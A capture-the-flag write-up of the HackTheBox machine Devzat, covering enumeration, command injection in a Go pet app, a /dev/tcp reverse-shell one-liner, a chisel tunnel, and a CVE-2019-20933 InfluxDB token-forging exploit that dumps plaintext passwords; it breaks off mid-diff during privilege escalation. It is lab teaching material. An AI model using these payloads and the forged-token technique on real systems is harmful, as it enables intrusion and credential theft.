Devzat is one of the machines currently available on the HackTheBox hacking platform and is rated Medium difficulty.
In this case it is a machine based on the Linux operating system.
Port scanning
As usual, we add the IP of the Devzat machine, 10.10.11.118, to /etc/hosts as devzat.htb and start with an nmap port scan.
```
# Nmap 7.92 scan initiated Wed Jan 12 08:02:12 2022 as: nmap -sV -sC -oA enumeration/nmap 10.10.11.118
Nmap scan report for 10.10.11.118
Host is up (0.047s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
|   256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_  256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://devzat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
8000/tcp open  ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-Go
| ssh-hostkey: 
|_  3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.92%I=7%D=1/12%Time=61DE7CFD%P=x86_64-pc-linux-gnu%r(NU
SF:LL,C,"SSH-2\.0-Go\r\n");
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 08:02:53 2022 -- 1 IP address (1 host up) scanned in 41.71 seconds
```
Looking at the open ports we see two interesting ones: port 80, which serves a website, and port 8000, where a Go application is exposed over SSH (the banner is SSH-2.0-Go rather than OpenSSH, so this is not the system sshd).
Enumeration
We begin enumeration by browsing the website at http://devzat.htb
Looking through the site we find something interesting near the bottom, where it explains how to connect to a chat over SSH on port 8000, the one we saw earlier.
So let's connect to it
```
$ ssh -l devbot devzat.htb -p 8000
Nickname already in use, please choose a different one.
> devzat
Less than a minute earlier
devbot: You seem to be new here hi. Welcome to Devzat! Run /help to see what you can do.
devbot: hi has joined the chat
hi: how are u
devbot: hi has left the chat
devbot: hi stayed on for 2 minutes
Welcome to the chat. There are no more users
devbot: devzat has joined the chat
devzat: 
```
Let's look at the chat's help
```
devzat: /help
[SYSTEM] Welcome to Devzat! Devzat is chat over SSH: github.com/quackduck/devzat
[SYSTEM] Because there's SSH apps on all platforms, even on mobile, you can join from anywhere.
[SYSTEM] 
[SYSTEM] Interesting features:
[SYSTEM] • Many, many commands. Run /commands.
[SYSTEM] • Rooms! Run /room to see all rooms and use /room #foo to join a new room.
[SYSTEM] • Markdown support! Tables, headers, italics and everything. Just use in place of newlines.
[SYSTEM] • Code syntax highlighting. Use Markdown fences to send code. Run /example-code to see an example.
[SYSTEM] • Direct messages! Send a quick DM using =user <msg> or stay in DMs by running /room @user.
[SYSTEM] • Timezone support, use /tz Continent/City to set your timezone.
[SYSTEM] • Built in Tic Tac Toe and Hangman! Run /tic or /hang <word> to start new games.
[SYSTEM] • Emoji replacements! (like on Slack and Discord)
[SYSTEM] 
[SYSTEM] For replacing newlines, I often use bulkseotools.com/add-remove-line-breaks.php.
[SYSTEM] 
[SYSTEM] Made by Ishan Goel with feature ideas from friends.
[SYSTEM] Thanks to Caleb Denio for lending his server!
[SYSTEM] 
[SYSTEM] For a list of commands run
```
And its available commands
```
devzat: /commands
[SYSTEM] Commands
[SYSTEM] clear - Clears your terminal
[SYSTEM] message - Sends a private message to someone
[SYSTEM] users - Gets a list of the active users
[SYSTEM] all - Gets a list of all users who has ever connected
[SYSTEM] exit - Kicks you out of the chat incase your client was bugged
[SYSTEM] bell - Toggles notifications when you get pinged
[SYSTEM] room - Changes which room you are currently in
[SYSTEM] id - Gets the hashed IP of the user
[SYSTEM] commands - Get a list of commands
[SYSTEM] nick - Change your display name
[SYSTEM] color - Change your display name color
[SYSTEM] timezone - Change how you view time
[SYSTEM] emojis - Get a list of emojis you can use
[SYSTEM] help - Get generic info about the server
[SYSTEM] tictactoe - Play tictactoe
[SYSTEM] hangman - Play hangman
[SYSTEM] shrug - Drops a shrug emoji
[SYSTEM] ascii-art - Bob ross with text
[SYSTEM] example-code - Hello world!
devzat: 
```
After spending a while in the chat and going through its options, it doesn't look like we can do much more here for now, so we move on to further enumeration. Fuzzing the Host header for virtual hosts turns up an interesting one
```
$ ffuf -c -u http://devzat.htb -H "Host: FUZZ.devzat.htb" -w ~/github/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://devzat.htb
 :: Wordlist         : FUZZ: /home/asdf/github/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.devzat.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

pets                    [Status: 200, Size: 510, Words: 20, Lines: 21]
:: Progress: [4997/4997] :: Job [1/1] :: 855 req/sec :: Duration: [0:00:09] :: Errors: 0 ::
```
We discover pets.devzat.htb, which turns out to be a pet inventory
There doesn't seem to be much more here, so we enumerate directories with gobuster and find one in particular that will help us (note that -b 200,404 hides 200 responses, so only redirects and 403s are listed, which is enough to spot the exposed .git directory)
```
$ gobuster dir -u http://pets.devzat.htb/ -w ~/github/SecLists/Discovery/Web-Content/raft-small-words.txt -t 150 -b 200,404
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://pets.devzat.htb/
[+] Method:                  GET
[+] Threads:                 150
[+] Wordlist:                /home/asdf/github/SecLists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes:   200,404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/12 08:21:24 Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 40] [--> /css/]
/build                (Status: 301) [Size: 42] [--> /build/]
/server-status        (Status: 403) [Size: 280]
/.git                 (Status: 301) [Size: 41] [--> /.git/]

===============================================================
2022/01/12 08:21:45 Finished
===============================================================
```
We see an exposed .git directory, so we use git-dumper to download its contents and rebuild the repository locally
```
$ ~/github/git-dumper/git-dumper.py http://pets.devzat.htb/.git pets-git
[-] Testing http://pets.devzat.htb/.git/HEAD [200]
[-] Testing http://pets.devzat.htb/.git/ [200]
[-] Fetching common files
[-] Fetching http://pets.devzat.htb/.gitignore [200]
[-] Fetching http://pets.devzat.htb/.git/description [200]
[-] Fetching http://pets.devzat.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://pets.devzat.htb/.git/COMMIT_EDITMSG [200]
[-] Fetching http://pets.devzat.htb/.git/hooks/pre-push.sample [200]
[-] Fetching http://pets.devzat.htb/.git/hooks/post-commit.sample [404]
[-] Fetching http://pets.devzat.htb/.git/hooks/post-receive.sample [404]
[-] Fetching http://pets.devzat.htb/.git/hooks/commit-msg.sample [200]
[-] Fetching http://pets.devzat.htb/.git/hooks/pre-receive.sample [200]
[-] Fetching http://pets.devzat.htb/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://pets.devzat.htb/.git/hooks/post-update.sample [200]
[-] Fetching http://pets.devzat.htb/.git/hooks/pre-commit.sample [200]
[-] Fetching http://pets.devzat.htb/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://pets.devzat.htb/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://pets.devzat.htb/.git/hooks/update.sample [200]
[-] Fetching http://pets.devzat.htb/.git/objects/info/packs [404]
[-] Fetching http://pets.devzat.htb/.git/index [200]
[-] Fetching http://pets.devzat.htb/.git/info/exclude [200]
[-] Finding refs/
[-] Fetching http://pets.devzat.htb/.git/FETCH_HEAD [404]
[-] Fetching http://pets.devzat.htb/.git/HEAD [200]
[-] Fetching http://pets.devzat.htb/.git/ORIG_HEAD [404]
[-] Fetching http://pets.devzat.htb/.git/config [200]
[-] Fetching http://pets.devzat.htb/.git/info/refs [404]
[-] Fetching http://pets.devzat.htb/.git/logs/HEAD [200]
[-] Fetching http://pets.devzat.htb/.git/logs/refs/heads/master [200]
[-] Fetching http://pets.devzat.htb/.git/logs/refs/remotes/origin/HEAD [404]
[-] Fetching http://pets.devzat.htb/.git/logs/refs/remotes/origin/master [404]
[-] Fetching http://pets.devzat.htb/.git/packed-refs [404]
[-] Fetching http://pets.devzat.htb/.git/logs/refs/stash [404]
[-] Fetching http://pets.devzat.htb/.git/refs/heads/master [200]
[-] Fetching http://pets.devzat.htb/.git/refs/remotes/origin/HEAD [404]
[-] Fetching http://pets.devzat.htb/.git/refs/remotes/origin/master [404]
[-] Fetching http://pets.devzat.htb/.git/refs/stash [404]
[-] Fetching http://pets.devzat.htb/.git/refs/wip/wtree/refs/heads/master [404]
[-] Fetching http://pets.devzat.htb/.git/refs/wip/index/refs/heads/master [404]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://pets.devzat.htb/.git/objects/53/5028803d222b0e4e9174f56529c0ed9fece4e0 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/7e/58517e9052d2ce28d12c549dc6ad30423e4c15 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/3c/6dd07ff39376f9d6f513b06167cc46b3a5af98 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/bc/b397a0fe8794bf9f03b934812f1efee5533f34 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/93/28c7f72254a754c91fddfd3c7e62c1251a2828 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/5b/2f2f4b425c4a753d5fb1bd01df5c2389dd95e0 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/da/93220bc34984be11385afbbe6cd044e7b455eb [200]
[-] Fetching http://pets.devzat.htb/.git/objects/ef/07a04ebb2fc92cf74a39e0e4b843630666a705 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/69/f1153887d2790c94f23a00c6f85958cf198418 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/e1/e271c00e31d309e9bab411caeef86d6d6d0d57 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/47/7b607f55d0d610decf739027ad1cad7846e8a1 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/59/b0e7c7cdc9f76c39eac534d56f2d92d1f995fe [200]
[-] Fetching http://pets.devzat.htb/.git/objects/d1/ac9ba1169e4076832034c5585e1c5bf9d6f83c [200]
[-] Fetching http://pets.devzat.htb/.git/objects/94/caeb6c465d2de18aa8cf364c56dd7515ea2a1a [200]
[-] Fetching http://pets.devzat.htb/.git/objects/ae/444e098873c82b664e7e6204594e5db26126ff [200]
[-] Fetching http://pets.devzat.htb/.git/objects/9d/f490e8cfdd75704d31f518caf76ab34494b124 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/03/cd4553f4c458eaef2f9734925b4e6e8c0d6df9 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/50/a0732c90552ff2e7ddd92d79fa964c0d9cd5eb [200]
[-] Fetching http://pets.devzat.htb/.git/objects/b8/a8f656e1607a2c36884d3165872ef3515b5879 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/7b/1ba8363499e091996af78355e71d504b220312 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/bb/28a9414d456a3e71bc1ffca30e95b98f6dc2f1 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/e9/f54b13d5e925602e04501415ced4bc0bc881d2 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/46/4614f32483e1fde60ee53f5d3b4d468d80ff62 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/dc/52d954d8d7f62c82cf63236d27093764a3d046 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/73/c1a4d5d156b6ddc62a7e3eba1c206bd6ad19c8 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/9d/ba8c340bf81622be7b48a7a3546869bfb851d4 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/fc/567cd2f11d83683d9eb4ca1a5fdc912f7d417c [200]
[-] Fetching http://pets.devzat.htb/.git/objects/d0/5ea581fbbf17eb0d3139f9937ac6a8fde98685 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/54/f95a54c49178dd5d496058e4ee99829748c49a [200]
[-] Fetching http://pets.devzat.htb/.git/objects/fa/e180dacc52937c1d6a24636431663d6754fef5 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/b0/00a57acd3e3027fac564a394704a66c824b76d [200]
[-] Fetching http://pets.devzat.htb/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] Fetching http://pets.devzat.htb/.git/objects/a4/04baa1852e12d51e5941285100091e9380bb03 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/82/74d7a547c0c3854c074579dfc359664082a8f6 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/1b/ac702fbb64129fc77d16b3e0c6652cf2ebc852 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/46/24e1f42ce009c31dba5a7c05df4c74472bd5be [200]
[-] Fetching http://pets.devzat.htb/.git/objects/55/1abaa3c707703936e5e31b8e4645b35e5f6c07 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/8d/a69971e32e6e08cae489b40731845d1de13258 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/3a/e86c86b0053b79cdbfc1456d6059986a9d3813 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/2f/37bf8e3a0ce61b74fec752fad017c363511d31 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/d5/84aafd3a034f1f93b4c2cfa285a77798965c2d [200]
[-] Fetching http://pets.devzat.htb/.git/objects/af/e315244f6dae3beda0159693d25a6e0466dd90 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/6f/3c2fa527470bae3ce951717b431c2fe5c38332 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/1d/69311c0a33ed5f21e8384641b310cc24e5701c [200]
[-] Fetching http://pets.devzat.htb/.git/objects/db/70e73e473f8ed16d596ab0fd373f3423fc8512 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/68/27c53e0d5e2f69f9fa7eb4f5b4b05ee429f539 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/bd/7e818ef2c4c78fe5f61a0285df390aa3fa0e43 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/f3/3e8162997aaa9da582aa81428ee87aa48953a6 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/d5/eee74298e64b35d51a1ded2a482ae9cbbfd3c1 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/7c/8dc57a3e2266715fac1ccdb4d677982154c16d [200]
[-] Fetching http://pets.devzat.htb/.git/objects/17/b8e146f96cd4cd6bd9d5a9215ade0e8cad656e [200]
[-] Fetching http://pets.devzat.htb/.git/objects/5d/cebd6a2a7127228bf4330ae18b78785942ec19 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/4e/48a46697302eb89d858229ec12ad23edd9b259 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/dc/e459d0e5a832b08688e2331557535d60d8a171 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/3e/967e5015bbcd3460dd43f8acc05b3125eac4cd [200]
[-] Fetching http://pets.devzat.htb/.git/objects/47/a0383d182b9413440099ee04c25954e08494e8 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/d9/2ef698d7cbc3c1014a125e4dcd53be770d5beb [200]
[-] Fetching http://pets.devzat.htb/.git/objects/28/a51e070175ab78da05529ff059367df9df3e57 [200]
[-] Running git checkout .
```
Reviewing the recovered code we see that when the application loads a species, it concatenates the user-supplied value straight into a `sh -c` command line without any validation or sanitization, so this is a command-injection entry point
```go
func loadCharacter(species string) string {
	cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
	stdoutStderr, err := cmd.CombinedOutput()
	if err != nil {
		return err.Error()
	}
	return string(stdoutStderr)
}
```
With that in mind, we intercept the pet-creation request with Burp Suite and replace the value of the species field with our reverse shell, which is the following
```
bash -i >& /dev/tcp/IP/PORT 0>&1
```
We base64-encode it (so the special characters in the one-liner survive the trip through the request) and send it through Burp
And we get a shell as the user patrick on our listener
```
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from devzat.htb [10.10.11.118] 38912
bash: cannot set terminal process group (822): Inappropriate ioctl for device
bash: no job control in this shell
patrick@devzat:~/pets$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick)
patrick@devzat:~/pets$
```
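To make the injection concrete, here is an added example (not code from the pets repository or from this writeup's author) that places the vulnerable loadCharacter recovered above next to a hypothetical hardened replacement, loadCharacterSafe. The hardened version never spawns a shell: it checks the species name against a strict allowlist and reads the file with os.ReadFile under an explicit base directory. The baseDir parameter, the regular expression and the "; echo pwned" input are all assumptions for the demo.

```go
package main

import (
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
	"regexp"
)

// loadCharacter is the vulnerable function as recovered from the pets
// repository (reproduced here so both variants can be compared): the
// species string is concatenated into a `sh -c` command line, so any
// shell metacharacter in it is interpreted by sh.
func loadCharacter(species string) string {
	cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
	stdoutStderr, err := cmd.CombinedOutput()
	if err != nil {
		return err.Error()
	}
	return string(stdoutStderr)
}

// speciesRe is an allowlist (assumed for this example): 1 to 32 lowercase
// ASCII letters. Everything the shell or the filesystem could interpret
// (";", "|", "$", "(", "/", ".") is simply outside the alphabet.
var speciesRe = regexp.MustCompile(`^[a-z]{1,32}$`)

// loadCharacterSafe is a hypothetical hardened replacement. It validates
// the name first and then reads the file directly, with no shell at all,
// from <baseDir>/characteristics/<species>.
func loadCharacterSafe(baseDir, species string) (string, error) {
	if !speciesRe.MatchString(species) {
		return "", fmt.Errorf("invalid species name %q", species)
	}
	data, err := os.ReadFile(filepath.Join(baseDir, "characteristics", species))
	if err != nil {
		return "", fmt.Errorf("reading characteristics for %q: %w", species, err)
	}
	return string(data), nil
}

func main() {
	// Constructed demo input: with the original code the shell executes
	// `cat characteristics/; echo pwned`, so the injected command runs.
	fmt.Printf("vulnerable: %q\n", loadCharacter("; echo pwned"))
	if _, err := loadCharacterSafe(".", "; echo pwned"); err != nil {
		fmt.Println("hardened:", err)
	}
}
```

The real fix is the absence of `sh -c`; the allowlist is defence in depth. Passing the name straight to `exec.Command("cat", path)` would also remove the injection, but it still leaves path traversal through "../" unless the name is validated, which is why the regex is there.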
We're in, but this user can't read the flag, so we enumerate the system in detail and find a very interesting process
```
patrick@devzat:~$ ps aux|grep docker| grep -v grep|grep proxy
root        1253  0.0  0.1 549312  3888 ?        Sl   07:02   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8086 -container-ip 172.17.0.2 -container-port 8086
```
There is a container on the machine, and docker-proxy forwards port 8086 on localhost (127.0.0.1) to port 8086 of the container at 172.17.0.2, so let's see what is listening there.
Since the port is bound to localhost only, we need a tunnel between our machine and the victim; we'll use chisel for that.
First we bring up the server on our machine
```
$ chisel server -p 8000 --reverse
2022/01/12 09:13:42 server: Reverse tunnelling enabled
2022/01/12 09:13:42 server: Fingerprint 73p8CtOWHKemanx5sjWhIx6yTBWl5lYJ3GU3cYHi03Y=
2022/01/12 09:13:42 server: Listening on http://0.0.0.0:8000
```
Then we start the client on the victim, which connects back to our server and asks it to open a reverse port forward
```
patrick@devzat:/tmp$ ./chisel_1.7.6_linux_amd64 client 10.10.14.2:8000 R:8086
2022/01/12 08:40:20 client: Connecting to ws://10.10.14.2:8000
2022/01/12 08:40:21 client: Connected (Latency 60.55383ms)
```
On our side we see the session established and port 8086 on the devzat machine forwarded to port 8086 on our local machine
```
$ chisel server -p 8000 --reverse
2022/01/12 09:32:28 server: Reverse tunnelling enabled
2022/01/12 09:32:28 server: Fingerprint UkgTUpewy1KFU02O0qg/aR5rd/kBTX14sI3Fgk/RFtY=
2022/01/12 09:32:28 server: Listening on http://0.0.0.0:8000
2022/01/12 09:32:28 server: session#1: Client version (1.7.6) differs from server version (0.0.0-src)
2022/01/12 09:35:07 server: session#2: tun: proxy#R:8086=>8086: Listening
```
Now we use nmap against the forwarded port to find out what's there
```
# Nmap 7.92 scan initiated Wed Jan 12 09:36:31 2022 as: nmap -p 8086 -sV -oA enumeration/nmap_2 127.0.0.1
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00014s latency).

PORT     STATE SERVICE VERSION
8086/tcp open  http    InfluxDB http admin 1.7.5

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 09:36:38 2022 -- 1 IP address (1 host up) scanned in 7.19 seconds
```
We discover it is InfluxDB, and we also get its version, 1.7.5. A quick search turns up CVE-2019-20933, an authentication bypass fixed in 1.7.6 (a JWT signed with an empty shared secret is accepted when no shared-secret is configured), along with a public exploit for it
So we run it
```
$ python3 __main__.py

  _____        __ _            _____  ____    ______            _       _ _   
 |_   _|      / _| |          |  __ \|  _ \  |  ____|          | |     (_) |  
   | |  _ __ | |_| |_   ___  _| |  | | |_) | | |__  __  ___ __ | | ___  _| |_ 
   | | | '_ \|  _| | | | \ \/ / |  | |  _ <  |  __| \ \/ / '_ \| |/ _ \| | __|
  _| |_| | | | | | | |_| |>  <| |__| | |_) | | |____ >  <| |_) | | (_) | | |_ 
 |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/  |______/_/\_\ .__/|_|\___/|_|\__|
                                                         | |                  
                                                         |_|                  

CVE-2019-20933

Insert ip host (default localhost): 
Insert port (default 8086): 
Insert influxdb user (wordlist path to bruteforce username): /home/asdf/github/SecLists/Usernames/Names/names.txt

Start username bruteforce
[x] aaliyah
[x] aaren
[x] aarika
[x] aaron
[x] aartjan
[x] aarushi
[x] abagael
[x] abagail
[x] abahri
[x] abbas
[x] abbe
[x] abbey
[x] abbi
[x] abbie
[x] abby
[x] abbye
[x] abdalla
[x] abdallah
[x] abdul
[x] abdullah
[x] abe
[x] abel
[x] abi
[x] abia
[x] abigael
[x] abigail
[x] abigale
[x] abra
[x] abraham
[x] abram
[x] abree
[x] abrianna
[x] abriel
[x] abrielle
[x] abu
[x] aby
[x] acacia
[x] access
[x] accounting
[x] ace
[x] achal
[x] achamma
[x] action
[x] ada
[x] adah
[x] adair
[x] adalia
[x] adaline
[x] adalyn
[x] adam
[x] adan
[x] adara
[x] adda
[x] addi
[x] addia
[x] addie
[x] addilyn
[x] addison
[x] addons
[x] addy
[x] ade
[x] adel
[x] adela
[x] adelaida
[x] adelaide
[x] adele
[x] adelene
[x] adelheid
[x] adelia
[x] adelice
[x] adelina
[x] adelind
[x] adeline
[x] adella
[x] adelle
[x] adelynn
[x] aden
[x] adena
[x] adeniyi
[x] adey
[x] adi
[x] adiana
[x] adie
[x] adina
[x] aditya
[v] admin

Host vulnerable !!!

Databases list:

1) devzat
2) _internal

Insert database name (exit to close): 
```
Bingo! The username brute force is needed because the forged token is only accepted for a username that actually exists in InfluxDB; once "admin" hits, let's see which tables (measurements) exist in the devzat database
```
[devzat] Insert query (exit to change db): show measurements
{
    "results": [
        {
            "series": [
                {
                    "columns": [
                        "name"
                    ],
                    "name": "measurements",
                    "values": [
                        [
                            "user"
                        ]
                    ]
                }
            ],
            "statement_id": 0
        }
    ]
}
```
And we dump the contents of the user measurement
```
[devzat] Insert query (exit to change db): select * from "user"
{
    "results": [
        {
            "series": [
                {
                    "columns": [
                        "time",
                        "enabled",
                        "password",
                        "username"
                    ],
                    "name": "user",
                    "values": [
                        [
                            "2021-06-22T20:04:16.313965493Z",
                            false,
                            "WillyWonka2021",
                            "wilhelm"
                        ],
                        [
                            "2021-06-22T20:04:16.320782034Z",
                            true,
                            "woBeeYareedahc7Oogeephies7Aiseci",
                            "catherine"
                        ],
                        [
                            "2021-06-22T20:04:16.996682002Z",
                            true,
                            "RoyalQueenBee$",
                            "charles"
                        ]
                    ]
                }
            ],
            "statement_id": 0
        }
    ]
}
```
And we have passwords, stored in plaintext.
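To show what the exploit above is actually doing under the hood, here is an added example (not the public exploit's code and not from this writeup's author) that forges the bearer token InfluxDB 1.x expects and verifies it the way the vulnerable server does. InfluxDB 1.x authenticates JWTs carrying a `username` and `exp` claim, HS256-signed with the `[http] shared-secret`; CVE-2019-20933 is that a server with authentication enabled but no shared secret configured verifies against the empty string, so a token signed with "" is accepted for any existing user. Assumptions: the tunnelled instance at http://127.0.0.1:8086, the "admin" username and the one-hour validity are illustrative; VerifyHS256 is a model of the server-side check, written here with the standard library only.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"net/url"
	"strings"
	"time"
)

// b64url is the JWT encoding: base64url without padding.
func b64url(b []byte) string { return base64.RawURLEncoding.EncodeToString(b) }

// signHS256 computes the JWS HS256 signature over "header.payload".
func signHS256(signingInput string, secret []byte) string {
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(signingInput))
	return b64url(mac.Sum(nil))
}

// ForgeInfluxToken builds the JWT InfluxDB 1.x accepts as a bearer token:
// claims "username" and "exp", HS256-signed with the configured shared
// secret. With secret = "" this reproduces the CVE-2019-20933 condition.
func ForgeInfluxToken(username string, exp time.Time, secret []byte) (string, error) {
	header, err := json.Marshal(map[string]string{"alg": "HS256", "typ": "JWT"})
	if err != nil {
		return "", err
	}
	claims, err := json.Marshal(map[string]interface{}{"username": username, "exp": exp.Unix()})
	if err != nil {
		return "", err
	}
	signingInput := b64url(header) + "." + b64url(claims)
	return signingInput + "." + signHS256(signingInput, secret), nil
}

// VerifyHS256 models the server-side check: recompute the MAC with the
// server's secret, compare in constant time, then decode the claims and
// require a non-expired "exp". "now" is injected so the check is testable.
func VerifyHS256(token string, secret []byte, now time.Time) (map[string]interface{}, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, errors.New("malformed token")
	}
	if !hmac.Equal([]byte(signHS256(parts[0]+"."+parts[1], secret)), []byte(parts[2])) {
		return nil, errors.New("signature mismatch")
	}
	raw, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return nil, err
	}
	var claims map[string]interface{}
	if err := json.Unmarshal(raw, &claims); err != nil {
		return nil, err
	}
	exp, ok := claims["exp"].(float64)
	if !ok || now.Unix() > int64(exp) {
		return nil, errors.New("missing or expired exp claim")
	}
	return claims, nil
}

// QueryURL builds the /query request the forged token is sent with, in an
// "Authorization: Bearer <token>" header.
func QueryURL(base, db, q string) string {
	v := url.Values{}
	v.Set("db", db)
	v.Set("q", q)
	return base + "/query?" + v.Encode()
}

func main() {
	// Assumed target: the tunnelled InfluxDB on 127.0.0.1:8086 with auth
	// enabled, no shared-secret set, and "admin" as an existing user.
	tok, err := ForgeInfluxToken("admin", time.Now().Add(time.Hour), []byte(""))
	if err != nil {
		panic(err)
	}
	fmt.Printf("curl -H 'Authorization: Bearer %s' '%s'\n", tok,
		QueryURL("http://127.0.0.1:8086", "devzat", `SELECT * FROM "user"`))
	_, accepted := VerifyHS256(tok, []byte(""), time.Now())
	_, rejected := VerifyHS256(tok, []byte("a-real-shared-secret"), time.Now())
	fmt.Println("empty secret accepts:", accepted == nil, "| real secret rejects:", rejected != nil)
}
```

The same model also explains the fix: 1.7.6 refuses bearer authentication outright when the shared secret is empty, so no token verifies and the brute force above never gets a hit. On the defensive side, a plaintext `password` column in a time-series database is the other finding worth reporting here.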
Getting the user flag
We use the password obtained for catherine to switch to that user and grab the first flag
```
patrick@devzat:~$ su - catherine
Password: 
catherine@devzat:~$ ls -l
total 4
-r-------- 1 catherine catherine 33 Jan 12 07:02 user.txt
catherine@devzat:~$ cat user.txt
4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxf
```
Privilege escalation
At this point we enumerate the machine again as the new user to see what else turns up, and we come across two very juicy backups that only catherine can read
```
catherine@devzat:/var/backups$ ll
total 140
drwxr-xr-x  2 root      root       4096 Sep 29 16:25 ./
drwxr-xr-x 14 root      root       4096 Jun 22  2021 ../
-rw-r--r--  1 root      root      59142 Sep 28 18:45 apt.extended_states.0
-rw-r--r--  1 root      root       6588 Sep 21 20:17 apt.extended_states.1.gz
-rw-r--r--  1 root      root       6602 Jul 16 06:41 apt.extended_states.2.gz
-rw-------  1 catherine catherine 28297 Jul 16 07:00 devzat-dev.zip
-rw-------  1 catherine catherine 27567 Jul 16 07:00 devzat-main.zip
```
One corresponds to the development environment and the other to the main environment we connected to earlier, so we download both and diff them. After a while looking, the interesting difference is in commands.go
```diff
$ diff main/commands.go dev/commands.go
3a4
> 	"bufio"
4a6,7
> 	"os"
> 	"path/filepath"
36a40
> 	file = commandInfo{"file", "Paste a files content directly to chat [alpha]", fileCommand, 1, false, nil}
38c42,101
< 	commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode}
---
> 	commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode, file}
> }
> 
> func fileCommand(u *user, args []string) {
